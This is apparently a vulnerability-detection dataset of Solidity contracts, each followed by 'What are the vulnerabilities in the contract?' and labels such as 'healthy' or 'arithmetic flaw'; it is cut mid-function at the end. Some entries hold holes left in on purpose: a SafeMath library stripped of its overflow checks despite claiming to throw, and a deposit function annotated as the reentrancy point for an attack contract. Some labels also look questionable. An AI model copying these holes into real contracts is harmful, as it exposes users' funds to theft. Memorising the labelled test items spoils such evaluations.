277          *  mintTokens = actualMintAmount / exchangeRate
278          */
279         vars.mintTokens = div_ScalarByExpTruncate(vars.actualMintAmount, Exp({mantissa: vars.exchangeRateMantissa}));

280         /*
281          * We calculate the new total supply of cTokens and minter token balance, checking for overflow:
282          *  totalSupply = totalSupply + mintTokens
283          *  accountTokens[minter] = accountTokens[minter] + mintTokens
284          */
285         totalSupply = add_(totalSupply, vars.mintTokens);
286         accountTokens[minter] = add_(accountTokens[minter], vars.mintTokens);

287         /* We emit a Mint event, and a Transfer event */
288         emit Mint(minter, vars.actualMintAmount, vars.mintTokens);
289         emit Transfer(address(this), minter, vars.mintTokens);

290         /* We call the defense hook */
291         comptroller.mintVerify(address(this), minter, vars.actualMintAmount, vars.mintTokens);

292         return (uint256(Error.NO_ERROR), vars.actualMintAmount);
293     }

294     struct RedeemLocalVars {
295         uint256 exchangeRateMantissa;
296         uint256 redeemTokens;
297         uint256 redeemAmount;
298         uint256 totalSupplyNew;
299         uint256 accountTokensNew;
300     }

301     /**
302      * @notice User redeems cTokens in exchange for the underlying asset
303      * @dev Assumes interest has already been accrued up to the current block. Only one of redeemTokensIn or redeemAmountIn may be non-zero and it would do nothing if both are zero.
304      * @param redeemer The address of the account which is redeeming the tokens
305      * @param redeemTokensIn The number of cTokens to redeem into underlying
306      * @param redeemAmountIn The number of underlying tokens to receive from redeeming cTokens
307      * @param isNative The amount is in native or not
308      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
309      */
310     function redeemFresh(
311         address payable redeemer,
312         uint256 redeemTokensIn,
313         uint256 redeemAmountIn,
314         bool isNative
315     ) internal returns (uint256) {
       
316         RedeemLocalVars memory vars;

317         /* exchangeRate = invoke Exchange Rate Stored() */
318         vars.exchangeRateMantissa = exchangeRateStoredInternal();

319         /* If redeemTokensIn > 0: */
320         if (redeemTokensIn > 0) {
321             /*
322              * We calculate the exchange rate and the amount of underlying to be redeemed:
323              *  redeemTokens = redeemTokensIn
324              *  redeemAmount = redeemTokensIn x exchangeRateCurrent
325              */
326             vars.redeemTokens = redeemTokensIn;
327             vars.redeemAmount = mul_ScalarTruncate(Exp({mantissa: vars.exchangeRateMantissa}), redeemTokensIn);
328         } else {
329             /*
330              * We get the current exchange rate and calculate the amount to be redeemed:
331              *  redeemTokens = redeemAmountIn / exchangeRate
332              *  redeemAmount = redeemAmountIn
333              */
334             vars.redeemTokens = div_ScalarByExpTruncate(redeemAmountIn, Exp({mantissa: vars.exchangeRateMantissa}));
335             vars.redeemAmount = redeemAmountIn;
336         }

 
337         /*
338          * Return if redeemTokensIn and redeemAmountIn are zero.
339          * Put behind `redeemAllowed` for accuring potential COMP rewards.
340          */
341         if (redeemTokensIn == 0 && redeemAmountIn == 0) {
342             return uint256(Error.NO_ERROR);
343         }

344         /*
345          * We calculate the new total supply and redeemer balance, checking for underflow:
346          *  totalSupplyNew = totalSupply - redeemTokens
347          *  accountTokensNew = accountTokens[redeemer] - redeemTokens
348          */
349         vars.totalSupplyNew = sub_(totalSupply, vars.redeemTokens);
350         vars.accountTokensNew = sub_(accountTokens[redeemer], vars.redeemTokens);

         
351         /////////////////////////
352         // EFFECTS & INTERACTIONS
353         // (No safe failures beyond this point)

354         /* We write previously calculated values into storage */
355         totalSupply = vars.totalSupplyNew;
356         accountTokens[redeemer] = vars.accountTokensNew;

357         /*
358          * We invoke doTransferOut for the redeemer and the redeemAmount.
359          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
360          *  On success, the cToken has redeemAmount less of cash.
361          *  doTransferOut reverts if anything goes wrong, since we can't be sure if side effects occurred.
362          */
363         doTransferOut(redeemer, vars.redeemAmount, isNative);

364         /* We emit a Transfer event, and a Redeem event */
365         emit Transfer(redeemer, address(this), vars.redeemTokens);
366         emit Redeem(redeemer, vars.redeemAmount, vars.redeemTokens);

367         /* We call the defense hook */
368         comptroller.redeemVerify(address(this), redeemer, vars.redeemAmount, vars.redeemTokens);

369         return uint256(Error.NO_ERROR);
370     }

371     /**
372      * @notice Transfers collateral tokens (this market) to the liquidator.
373      * @dev Called only during an in-kind liquidation, or by liquidateBorrow during the liquidation of another CToken.
374      *  Its absolutely critical to use msg.sender as the seizer cToken and not a parameter.
375      * @param seizerToken The contract seizing the collateral (i.e. borrowed cToken)
376      * @param liquidator The account receiving seized collateral
377      * @param borrower The account having collateral seized
378      * @param seizeTokens The number of cTokens to seize
379      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
380      */
381     function seizeInternal(
382         address seizerToken,
383         address liquidator,
384         address borrower,
385         uint256 seizeTokens
386     ) internal returns (uint256) {

387        /*
388          * Return if seizeTokens is zero.
389          * Put behind `seizeAllowed` for accuring potential COMP rewards.
390          */
391         if (seizeTokens == 0) {
392             return uint256(Error.NO_ERROR);
393         }
394               /*
395          * We calculate the new borrower and liquidator token balances, failing on underflow/overflow:
396          *  borrowerTokensNew = accountTokens[borrower] - seizeTokens
397          *  liquidatorTokensNew = accountTokens[liquidator] + seizeTokens
398          */
399         accountTokens[borrower] = sub_(accountTokens[borrower], seizeTokens);
400         accountTokens[liquidator] = add_(accountTokens[liquidator], seizeTokens);

401         /* Emit a Transfer event */
402         emit Transfer(borrower, liquidator, seizeTokens);

403         /* We call the defense hook */
404         comptroller.seizeVerify(address(this), seizerToken, liquidator, borrower, seizeTokens);

405         return uint256(Error.NO_ERROR);
406     }
407 }
What are the vulnerabilities in the contract?
cross bridge
inconsistent state update 
ID uniqueness violation
arithmetic flaw
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {
3    function testTuple() public pure{
4       // (uint a, uint b) = (1, 3); //cannot handle multiple declarations in tuples
5       uint a;
6       uint b;
7       (a,  b) = (1, 3);
  

8       (a, b) = returnTuple();
   
9       (a, b) = returnTupleByName();
    
10       //(, b) = returnTuple(); //can;t handle null placeholders
11       //assert (b == 40);
12    }
   
13    function returnTuple() private pure returns (uint, uint){
14       return (4, 40); 
15    }

16    function returnTupleByName() private pure returns (uint a, uint b){
17       a = 5;
18       b = 55;
19       return (a,b); 
20    }
21 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 /**
2  *Submitted for verification at Etherscan.io on 2018-05-09
3 */

4 pragma solidity ^0.4.21;


5 /**
6  * @title SafeMath
7  * @dev Math operations with safety checks that throw on error
8  */
9 library SafeMath {

10   /**
11   * @dev Multiplies two numbers, throws on overflow.
12   */
13   function mul(uint256 a, uint256 b) internal pure returns (uint256) {
14     if (a == 0) {
15       return 0;
16     }
17     uint256 c = a * b;  
18     return c;
19   }

20   /**
21   * @dev Integer division of two numbers, truncating the quotient.
22   */
23   function div(uint256 a, uint256 b) internal pure returns (uint256) {
24     // assert(b > 0); // Solidity automatically throws when dividing by 0
25     // uint256 c = a / b;
26     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
27     return a / b;
28   }

29   /**
30   * @dev Subtracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend).
31   */
32   function sub(uint256 a, uint256 b) internal pure returns (uint256) {  
33     return a - b;
34   }

35   /**
36   * @dev Adds two numbers, throws on overflow.
37   */
38   function add(uint256 a, uint256 b) internal pure returns (uint256) {
39     uint256 c = a + b;
40     return c;
41   }
42 }

43 /**
44  * @title ERC20Basic
45  * @dev Simpler version of ERC20 interface
46  * @dev see https://github.com/ethereum/EIPs/issues/179
47  */
48 contract ERC20Basic {
49   function totalSupply() public view returns (uint256);
50   function balanceOf(address who) public view returns (uint256);
51   function transfer(address to, uint256 value) public returns (bool);
52   event Transfer(address indexed from, address indexed to, uint256 value);
53 }

54 /**
55  * @title ERC20 interface
56  * @dev see https://github.com/ethereum/EIPs/issues/20
57  */
58 contract ERC20 is ERC20Basic {
59   function allowance(address owner, address spender) public view returns (uint256);
60   function transferFrom(address from, address to, uint256 value) public returns (bool);
61   function approve(address spender, uint256 value) public returns (bool);
62   event Approval(address indexed owner, address indexed spender, uint256 value);
63 }

64 /**
65  * @title Basic token
66  * @dev Basic version of StandardToken, with no allowances.
67  */
68 contract BasicToken is ERC20Basic {
69   using SafeMath for uint256;

70   mapping(address => uint256) balances;

71   uint256 totalSupply_;

72   /**
73   * @dev total number of tokens in existence
74   */
75   function totalSupply() public view returns (uint256) {
76     return totalSupply_;
77   }

78   /**
79   * @dev transfer token for a specified address
80   * @param _to The address to transfer to.
81   * @param _value The amount to be transferred.
82   */
83   function transfer(address _to, uint256 _value) public returns (bool) {
84     require(_to != address(0));
85     require(_value <= balances[msg.sender]);

86     balances[msg.sender] = balances[msg.sender].sub(_value);
87     balances[_to] = balances[_to].add(_value);
88     emit Transfer(msg.sender, _to, _value);
89     return true;
90   }

91   /**
92   * @dev Gets the balance of the specified address.
93   * @param _owner The address to query the the balance of.
94   * @return An uint256 representing the amount owned by the passed address.
95   */
96   function balanceOf(address _owner) public view returns (uint256 balance) {
97     return balances[_owner];
98   }

99 }
What are the vulnerabilities in the contract?
arithmetic flaw 
integer overflow/underflow
incorrect visibility/ownership
<end of text>
1 pragma solidity ^0.4.16;
 
2 interface tokenRecipient { function receiveApproval(address _from, uint256 _value, address _token, bytes _extraData) public; }
 
3 contract TokenERC20 {
4     string public name;
5     string public symbol;
6     uint8 public decimals = 18;  // 18 
7     uint256 public totalSupply;
 
8     mapping (address => uint256) public balanceOf;  //
9     mapping (address => mapping (address => uint256)) public allowance;
 
10     event Transfer(address indexed from, address indexed to, uint256 value);
 
11     event Burn(address indexed from, uint256 value);
 
 
12     function TokenERC20(uint256 initialSupply, string tokenName, string tokenSymbol) public {
13         totalSupply = initialSupply * 10 ** uint256(decimals);
14         balanceOf[msg.sender] = totalSupply;
15         name = tokenName;
16         symbol = tokenSymbol;
17     }
 
 
18     function _transfer(address _from, address _to, uint _value) internal {
19         require(_to != 0x0);
20         require(balanceOf[_from] >= _value);
21         require(balanceOf[_to] + _value > balanceOf[_to]);
22         uint previousBalances = balanceOf[_from] + balanceOf[_to];
23         balanceOf[_from] -= _value;
24         balanceOf[_to] += _value;
25         Transfer(_from, _to, _value);
26         assert(balanceOf[_from] + balanceOf[_to] == previousBalances);
27     }
 
28     function transfer(address _to, uint256 _value) public returns (bool) {
29         _transfer(msg.sender, _to, _value);
30         return true;
31     }
 
32     function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) {
33         require(_value <= allowance[_from][msg.sender]);     // Check allowance
34         allowance[_from][msg.sender] -= _value;
35         _transfer(_from, _to, _value);
36         return true;
37     }
 
38     function approve(address _spender, uint256 _value) public
39         returns (bool success) {
40         allowance[msg.sender][_spender] = _value;
41         return true;
42     }
 
43     function approveAndCall(address _spender, uint256 _value, bytes _extraData) public returns (bool success) {
44         tokenRecipient spender = tokenRecipient(_spender);
45         if (approve(_spender, _value)) {
46             spender.receiveApproval(msg.sender, _value, this, _extraData);
47             return true;
48         }
49     }
 
50     function burn(uint256 _value) public returns (bool success) {
51         require(balanceOf[msg.sender] >= _value);
52         balanceOf[msg.sender] -= _value;
53         totalSupply -= _value;
54         Burn(msg.sender, _value);
55         return true;
56     }
 
57     function burnFrom(address _from, uint256 _value) public returns (bool success) {
58         require(balanceOf[_from] >= _value);
59         require(_value <= allowance[_from][msg.sender]);
60         balanceOf[_from] -= _value;
61         allowance[_from][msg.sender] -= _value;
62         totalSupply -= _value;
63         Burn(_from, _value);
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 contract SafeMath {

2     function safeAdd(uint a, uint b) public pure returns (uint c) {
3         c = a + b;
4         require(c >= a);
5     }

6     function safeSub(uint a, uint b) public pure returns (uint c) {
7         require(b <= a);
8         c = a - b;
9     }

10     function safeMul(uint a, uint b) public pure returns (uint c) {
11         c = a * b;
12         require(a == 0 || c / a == b);
13     }

14     function safeDiv(uint a, uint b) public pure returns (uint c) {
15         require(b > 0);
16         c = a / b;
17     }
18 }


19 /**
20 ERC Token Standard #20 Interface
21 https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20-token-standard.md
22 */
23 contract ERC20Interface {
24     function totalSupply() public constant returns (uint);
25     function balanceOf(address tokenOwner) public constant returns (uint balance);
26     function allowance(address tokenOwner, address spender) public constant returns (uint remaining);
27     function transfer(address to, uint tokens) public returns (bool success);
28     function approve(address spender, uint tokens) public returns (bool success);
29     function transferFrom(address from, address to, uint tokens) public returns (bool success);

30     event Transfer(address indexed from, address indexed to, uint tokens);
31     event Approval(address indexed tokenOwner, address indexed spender, uint tokens);
32 }


33 /**
34 Contract function to receive approval and execute function in one call

35 Borrowed from MiniMeToken
36 */
37 contract ApproveAndCallFallBack {
38     function receiveApproval(address from, uint256 tokens, address token, bytes data) public;
39 }

40 /**
41 ERC20 Token, with the addition of symbol, name and decimals and assisted token transfers
42 */
43 contract SANTAToken is ERC20Interface, SafeMath {
44     string public symbol;
45     string public  name;
46     uint8 public decimals;
47     uint public _totalSupply;

48     mapping(address => uint) balances;
49     mapping(address => mapping(address => uint)) allowed;


50     // ------------------------------------------------------------------------
51     // Constructor
52     // ------------------------------------------------------------------------
53     constructor() public {
54         symbol = "SANTA";
55         name = "santa.investments";
56         decimals = 0;
57         _totalSupply = 100000000;
58         balances[0x4a1D652Dfb96eec4cF8b7245A278296d6FdE632A] = _totalSupply;
59         emit Transfer(address(0), 0x4a1D652Dfb96eec4cF8b7245A278296d6FdE632A, _totalSupply);
60     }


61     // ------------------------------------------------------------------------
62     // Total supply
63     // ------------------------------------------------------------------------
64     function totalSupply() public constant returns (uint) {
65         return _totalSupply  - balances[address(0)];
66     }


67     // ------------------------------------------------------------------------
68     // Get the token balance for account tokenOwner
69     // ------------------------------------------------------------------------
70     function balanceOf(address tokenOwner) public constant returns (uint balance) {
71         return balances[tokenOwner];
72     }


73     // ------------------------------------------------------------------------
74     // Transfer the balance from token owner's account to to account
75     // - Owner's account must have sufficient balance to transfer
76     // - 0 value transfers are allowed
77     // ------------------------------------------------------------------------
78     function transfer(address to, uint tokens) public returns (bool success) {
79         balances[msg.sender] = safeSub(balances[msg.sender], tokens);
80         balances[to] = safeAdd(balances[to], tokens);
81         emit Transfer(msg.sender, to, tokens);
82         return true;
83     }


84     // ------------------------------------------------------------------------
85     // Token owner can approve for spender to transferFrom(...) tokens
86     // from the token owner's account
87     //
88     // https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20-token-standard.md
89     // recommends that there are no checks for the approval double-spend attack
90     // as this should be implemented in user interfaces 
91     // ------------------------------------------------------------------------
92     function approve(address spender, uint tokens) public returns (bool success) {
93         allowed[msg.sender][spender] = tokens;
94         emit Approval(msg.sender, spender, tokens);
95         return true;
96     }


97     // ------------------------------------------------------------------------
98     // Transfer tokens from the from account to the to account
99     // 
100     // The calling account must already have sufficient tokens approve(...)-d
101     // for spending from the from account and
102     // - From account must have sufficient balance to transfer
103     // - Spender must have sufficient allowance to transfer
104     // - 0 value transfers are allowed
105     // ------------------------------------------------------------------------
106     function transferFrom(address from, address to, uint tokens) public returns (bool success) {
107         balances[from] = safeSub(balances[from], tokens);
108         allowed[from][msg.sender] = safeSub(allowed[from][msg.sender], tokens);
109         balances[to] = safeAdd(balances[to], tokens);
110         emit Transfer(from, to, tokens);
111         return true;
112     }


113     // ------------------------------------------------------------------------
114     // Returns the amount of tokens approved by the owner that can be
115     // transferred to the spender's account
116     // ------------------------------------------------------------------------
117     function allowance(address tokenOwner, address spender) public constant returns (uint remaining) {
118         return allowed[tokenOwner][spender];
119     }


120     // ------------------------------------------------------------------------
121     // Token owner can approve for spender to transferFrom(...) tokens
122     // from the token owner's account. The spender contract function
123     // receiveApproval(...) is then executed
124     // ------------------------------------------------------------------------
125     function approveAndCall(address spender, uint tokens, bytes data) public returns (bool success) {
126         allowed[msg.sender][spender] = tokens;
127         emit Approval(msg.sender, spender, tokens);
128         ApproveAndCallFallBack(spender).receiveApproval(msg.sender, tokens, this, data);
129         return true;
130     }


131     // ------------------------------------------------------------------------
132     // Don't accept ETH
133     // ------------------------------------------------------------------------
134     function () public payable {
135         revert();
136     }
137 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 // array variable copy breaks

2 contract ArrayLength {
3     uint[12] a;

4     constructor (uint[12] memory d) public
5     {
6         require (d[1] == 5);
7         a = d;       
8         assert (d[1] == 5);
9     }

10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayNestedFixedSize {

3     // NOTE: the number of columns comes first in the declaration!
4     uint[3][2] a;
5     bool[2][2] aa;

6     constructor() {
7         assert (a[0][1] == 0);
8         assert (!aa[0][1]);
9     }

10     function test() public {
11         uint[3] b;
12         a[0][0] = 0;
13         a[0][1] = 1;
14         uint x = a[0][0]; //print
15         a[0][2] = 2;
16         a[1][0] = 3; //may alias with a[0][0]
17          x = a[0][0]; //print
18         a[1][1] = 4;
19         a[1][2] = 5;
20         b[0] = 5;    //may alias with a[1][0] or a[0][0]
21         x = a[0][0];  //print
22         assert (a[0][0] == 0 || a[0][0] == 3);
23         assert (a[0][1] == 1);
24         assert (a[0][2] == 2);
25         assert (a[1][0] == 3);
26         assert (a[1][1] == 4);
27         assert (a[1][2] == 5);

28     }
29 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 contract ArrayInit {

2     uint[2] a;
3     uint[2] b;
    
4     constructor() public {
5        b[1] = 22;
6        a[1] = 33;
7        assert (b[1] == 22);
8     }
9 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity ^0.5.2;

2 // Tests that function with inline assembly generates non-det result
3 contract AssemblyTest
4 {
5         bool b;
6         int x;
7     constructor () public {
8   }
        
9 function foo() public {
10                 b = bar(x);
11                 if (b)
12                 assert(false);
13         }
14 function bar(int x) public returns (bool) { 
15         uint256 size;
16         assembly { size := x }
17         return size > 0;
18         }
19 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Branch {

3     function testIf(bool b) public returns (uint a) {
4         if (b) {
5             a = 1;
6         } else {
7             a = 2;
8         }
9         assert (a == 1 || a == 2);
10     }

11     function testTernary(bool b) public returns (uint a) {
12         a = b ? 1 : 2;
13         assert (a == 1 || a == 2);
14     }

15 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Consts {

3     constructor () public {
4         uint a;
5         address b;
6         address c;

7         a = 10;
8         b = address(0x10);
9         c = address(0x12);

10         assert(b != c);
11     }
12}
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Foo {

3     uint a;

4     constructor () public {
5         a = 1;
6     }

7     function testConstructor() public {
8         assert (a == 1);
9     }

10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test shows an order in which base constructors for C are called:
3 // B(a) calls base ctor A(a) {x = a};
4 // ctor B is called {x++};
5 // ctor C is called {x++}


6 contract A {
7     uint x;
8     constructor (uint a) public {x = a;}
9 }

10 contract B is A {
11     constructor (uint a) A(a) public {x++;}
12 }    contract C is A, B {
13     constructor (uint a) B(a) public {
14          x++; 
15        assert (x == a + 2);
16 }
17 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 // Shows that constructor chaining still has a bug
2 // D constructor is called twice - see trace in corral.txt:
3 // ctor D {x = 1}
4 // ctor D {x = 1}
5 // ctor B
6 // ctor C

7 contract D {
8         uint x;
9     constructor () public { x++; }
10 }

11 contract B is D {
12     constructor () D() public {}
13 }

14 contract C is B {
15     constructor () public {
16          assert (x != 1); 
17 }   
18 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {
3    function testTuple() public pure{
4       // (uint a, uint b) = (1, 3); //cannot handle multiple declarations in tuples
5       uint a;
6       uint b;
7       /* only support function returns as tuples
8       (a,  b) = (1, 3);
9       assert (a == 1);
10       assert (b == 3);
11       */

12       (a, b) = returnTuple();
13       assert (a == 4);
14       assert (b == 40);

15       (a, b) = returnTupleByName();
16       assert (a == 5);
17       assert (b == 55);

18       //(, b) = returnTuple(); //can;t handle null placeholders
19       //assert (b == 40);
20    }
   
21    function returnTuple() private pure returns (uint, uint){
22       return (4, 40); 
23    }

24    function returnTupleByName() private pure returns (uint a, uint b){
25       a = 5;
26       b = 55;
27       return (a,b); 
28    }
29 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract LoopFor {

3     uint[2] a;

4     function testBoundedForLoop() public {
5         for (uint i = 0; i < 2; i += 1) {
6             a[i] = i;
7         }
8         assert (a[0] == 0);
9         assert (a[1] == 1);
10     }

11     uint[10] b;
    
12     function testUnboundedForLoop(uint n) public {
13         require (n > 0 && n < 10);
14         for (uint i = 0; i < n; i += 1) {
15             b[i] = i;
16         }
17         for (uint j = 0; j < n; j += 1) {
18             assert (b[j] == j);
19         }
20     }

21 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayDynamicStorage {

3     uint[] sa;

4     function ArrayDynamicStorage() {
5        assert (sa.length == 0);
6     }
7     function test() public {
8         sa.push(10);
9         sa.push(11);
10         assert (sa[0] == 10);
11         assert (sa[1] == 11);
12         assert (sa.length == 2);
13     }

14 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayFixedSize {

3     uint[2] a;

4     constructor() public {}

5     function test() public {
6         a[0] = 1;
7         a[1] = 2;
8         assert(a[0] == 1);
9         assert(a[1] == 2);
10     }
11 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1  contract ArrayInit {

2     uint[2] a;
3     uint[2] b;
    
4     constructor() public {
5        b[1] = 22;
6        a[1] = 33;
7        assert (b[1] == 22);
8     }
9 }
 
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract ArrayNestedFixedSize {

3     // NOTE: the number of columns comes first in the declaration!
4     uint[3][2] a;
5     bool[2][2] aa;

6     constructor() {
7         assert (a[0][1] == 0);
8         assert (!aa[0][1]);
9     }

10     function test() public {
11         uint[3] b;
12         a[0][0] = 0;
13         a[0][1] = 1;
14         uint x = a[0][0]; //print
15         a[0][2] = 2;
16         a[1][0] = 3; //may alias with a[0][0]
17         x = a[0][0]; //print
18         a[1][1] = 4;
19         a[1][2] = 5;
20         b[0] = 5;    //may alias with a[1][0] or a[0][0]
21         x = a[0][0];  //print
22         assert (a[0][0] == 0 || a[0][0] == 3);
23         assert (a[0][1] == 1);
24         assert (a[0][2] == 2);
25         assert (a[1][0] == 3);
26         assert (a[1][1] == 4);
27         assert (a[1][2] == 5);
28     }
29 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 contract ArrayInit {

2     uint[2] a;
3     uint[2] b;
    
4     constructor() public {
5        b[1] = 22;
6        a[1] = 33;
7        assert (b[1] == 22);
8     }
9 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Consts {

3     constructor () public {
4         uint a;
5         address b;
6         address c;

7         a = 10;
8         b = address(0x10);
9         c = address(0x12);

10         assert(b != c);
11     }
12 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract Foo {

3     uint a;

4     constructor () public {
5         a = 1;
6     }

7     function testConstructor() public {
8         assert (a == 1);
9     }
10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 // SPDX-License-Identifier: GNU-GPL v3.0 or later

2 pragma solidity ^0.8.0;

3 import "@openzeppelin/contracts/access/AccessControl.sol";
4 import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
5 import "@openzeppelin/contracts/token/ERC1155/ERC1155.sol";
6 import "./interfaces/IRevest.sol";
7 import "./interfaces/IAddressRegistry.sol";
8 import "./interfaces/ILockManager.sol";
9 import "./interfaces/ITokenVault.sol";
10 import "./interfaces/IAddressLock.sol";
11 import "./utils/RevestAccessControl.sol";
12 import "./interfaces/IFNFTHandler.sol";
13 import "./interfaces/IMetadataHandler.sol";

14 contract FNFTHandler is ERC1155, AccessControl, RevestAccessControl, IFNFTHandler {

15     bytes32 public constant PAUSER_ROLE = keccak256("PAUSER_ROLE");

16     mapping(uint => uint) public supply;
17     uint public fnftsCreated = 0;

18     /**
19      * @dev Primary constructor to create an instance of NegativeEntropy
20      * Grants ADMIN and MINTER_ROLE to whoever creates the contract
21      */
22     constructor(address provider) ERC1155("") RevestAccessControl(provider) {
23         _setupRole(DEFAULT_ADMIN_ROLE, _msgSender());
24         _setupRole(PAUSER_ROLE, _msgSender());
25     }

26     /**
27      * @dev See {IERC165-supportsInterface}.
28      */
29     function supportsInterface(bytes4 interfaceId) public view virtual override (AccessControl, ERC1155) returns (bool) {
30         return super.supportsInterface(interfaceId);
31     }


32     function mint(address account, uint id, uint amount, bytes memory data) external override onlyRevestController {
33         require(amount > 0, "Invalid amount");
34         require(supply[id] == 0, "Repeated mint for the same FNFT");
35         supply[id] += amount;
36         _mint(account, id, amount, data);
37         fnftsCreated += 1;
38     }

39     function mintBatchRec(address[] calldata recipients, uint[] calldata quantities, uint id, uint newSupply, bytes memory data) external override onlyRevestController {
40         supply[id] += newSupply;
41         for(uint i = 0; i < quantities.length; i++) {
42             _mint(recipients[i], id, quantities[i], data);
43         }
44         fnftsCreated += 1;
45     }

46     function mintBatch(address to, uint[] memory ids, uint[] memory amounts, bytes memory data) external override onlyRevestController {
47         _mintBatch(to, ids, amounts, data);
48     }

49     function setURI(string memory newuri) external override onlyRevestController {
50         _setURI(newuri);
51     }

52     function burn(address account, uint id, uint amount) external override onlyRevestController {
53         supply[id] -= amount;
54         _burn(account, id, amount);
55     }

56     function burnBatch(address account, uint[] memory ids, uint[] memory amounts) external override onlyRevestController {
57         _burnBatch(account, ids, amounts);
58     }

59     function getBalance(address account, uint id) external view override returns (uint) {
60         return balanceOf(account, id);
61     }

62     function getSupply(uint fnftId) public view override returns (uint) {
63         return supply[fnftId];
64     }

65     function getNextId() public view override returns (uint) {
66         return fnftsCreated;
67     }


68     // OVERIDDEN ERC-1155 METHODS

69     function _beforeTokenTransfer(
70         address operator,
71         address from,
72         address to,
73         uint[] memory ids,
74         uint[] memory amounts,
75         bytes memory data
76     ) internal override {
77         super._beforeTokenTransfer(operator, from, to, ids, amounts, data);
78         // Loop because all batch transfers must be checked
79         // Will only execute once on singular transfer
80         if (from != address(0) && to != address(0)) {
81             address vault = addressesProvider.getTokenVault();
82             bool canTransfer = !ITokenVault(vault).getNontransferable(ids[0]);
83             // Only check if not from minter
84             // And not being burned
85             if(ids.length > 1) {
86                 uint iterator = 0;
87                 while (canTransfer && iterator < ids.length) {
88                     canTransfer = !ITokenVault(vault).getNontransferable(ids[iterator]);
89                     iterator += 1;
90                 }
91             }
92              require(canTransfer, "E046");
93         }
94     }

95     function uri(uint fnftId) public view override returns (string memory) {
96         return IMetadataHandler(addressesProvider.getMetadataHandler()).getTokenURI(fnftId);
97     }

98     function renderTokenURI(
99         uint tokenId,
100         address owner
101     ) public view returns (
102         string memory baseRenderURI,
103         string[] memory parameters
104     ) {
105         return IMetadataHandler(addressesProvider.getMetadataHandler()).getRenderTokenURI(tokenId, owner);
106     }

107 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 // SPDX-License-Identifier: BUSL-1.1

2 pragma solidity 0.7.6;

3 import "@openzeppelin/contracts/math/SafeMath.sol";
4 import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
5 import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
6 import "@openzeppelin/contracts/token/ERC20/SafeERC20.sol";
7 import "@openzeppelin/contracts/access/Ownable.sol";
8 import "./interfaces/IVisor.sol";
9 import "./vVISR.sol";

10 // @title Rewards Hypervisor
11 // @notice fractionalize balance 
12 contract RewardsHypervisor {
13     using SafeERC20 for IERC20;
14     using SafeMath for uint256;

15     address public owner;
16     IERC20 public visr;
17     vVISR public vvisr;

18     modifier onlyOwner {
19         require(msg.sender == owner, "only owner");
20         _;
21     }

22     constructor(
23         address _visr,
24         address _vvisr
25     ) {
26         visr = IERC20(_visr);
27         vvisr = vVISR(_vvisr);
28         owner = msg.sender;
29     }

30     function deposit(
31         uint256 visrDeposit,
32         address payable from,
33         address to
34     ) external returns (uint256 shares) {
35         require(visrDeposit > 0, "deposits must be nonzero");
36         require(to != address(0) && to != address(this), "to");
37         require(from != address(0) && from != address(this), "from");

38         shares = visrDeposit;
39         if (vvisr.totalSupply() != 0) {
40           uint256 visrBalance = visr.balanceOf(address(this));
41           shares = shares.mul(vvisr.totalSupply()).div(visrBalance);
42         }

43         //this is the buggy line 
44         //call the owner function of the attack contract. 
45         //As long as the attack contract sets the return value to the contract address
46         // call the delegatedTransferERC20 function of the attack contract. 
47         //Here reentrancy is executed
48         if(isContract(from)) {
49           require(IVisor(from).owner() == msg.sender); 
50           //deposit func is called again 
51           assert( IVisor(from) !=  address(this)); 
52           IVisor(from).delegatedTransferERC20(address(visr), address(this), visrDeposit);
53         }
54         else {
55           visr.safeTransferFrom(from, address(this), visrDeposit);
56         }

57         vvisr.mint(to, shares);
58     }

59     // @param shares Number of rewards shares to redeem for VISR
60     // @param to Address to which redeemed pool assets are sent
61     // @param from Address from which liquidity tokens are sent
62     // @return rewards Amount of visr redeemed by the submitted liquidity tokens
63     function withdraw(
64         uint256 shares,
65         address to,
66         address payable from
67     ) external returns (uint256 rewards) {
68         require(shares > 0, "shares");
69         require(to != address(0), "to");
70         require(from != address(0), "from");

71         rewards = visr.balanceOf(address(this)).mul(shares).div(vvisr.totalSupply());
72         visr.safeTransfer(to, rewards);

